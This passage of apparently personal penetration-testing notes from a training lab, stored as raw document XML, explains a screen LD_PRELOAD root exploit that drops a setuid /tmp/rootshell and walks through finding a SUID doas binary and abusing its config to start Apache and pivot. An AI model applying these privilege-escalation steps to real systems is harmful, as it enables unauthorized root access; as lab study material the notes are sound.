    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how the attack works btw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No: rootshell does not depend on libhax.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They are two independent binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit chain is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build libhax.so (the payload library).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trick screen into loading it as root (LD_PRELOAD=/tmp/libhax.so screen ...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libhax.so executes malicious code as root — typically it drops a setuid root binary like /tmp/rootshell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you just run /tmp/rootshell and you’re root, no libhax.so involved anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D7">
      <w:pPr>
        <w:ind w:left="108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21D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7r1dogch7y7y" w:id="299"/>
      <w:bookmarkEnd w:id="299"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">doas (/usr/local/bin/doas)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Relia Challenge Lab on machine 172.16.xxx.20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See the Doas with SUID bit set (meaning we can run doas binary as root since root owns the binary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find files with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84" name="image75.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image75.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72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21E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21E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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138613" cy="2142209"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="285" name="image275.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image275.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId727"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4138613" cy="2142209"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here from the LinPeas, we see SUID bit set for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin/doas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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762500" cy="3644900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="485" name="image472.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image472.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId728"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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21E5">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LinPEAS automatically prints out the conf file, which tells us what we are allowed to do with doas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E6">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So basically, almost everything here is commented out, except for two lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>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permit nopass andrew as root cmd service args apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it says "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mandrew</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in the output but it’s a typo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache24 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">refers to Apache HTTP Server version 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As explained in the comment above this line, anyone in the wheel group can run ANY command as root. So, the goal should be to get access to a user in wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">permit nopass andrew as root cmd service args</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="e84c22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This line allows the user andrew to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root without needing a password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : this means the command service  is the only command we are allowed to run as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">args apache24 onestart </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: this means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the argument we are allowed to use with the service command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F1">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So, based on this, we can run this command to start apache server. This will allow us to pivot to www-data user or whoever is running web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>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doas service apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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doas service apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F4">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we could have also ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin/doas service apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the full path for doas, but it must have been added to PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>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635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="488" name="image477.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image477.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId729"/>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1F6">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First, we have to figure out the root directory of the apache server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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grep -i 'DocumentRoot' /usr/local/etc/apache24/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This searches up the config file for the document root path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output was: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentRoot "/usr/local/www/apache24/data"</w:t>
      </w:r>
    </w:p>
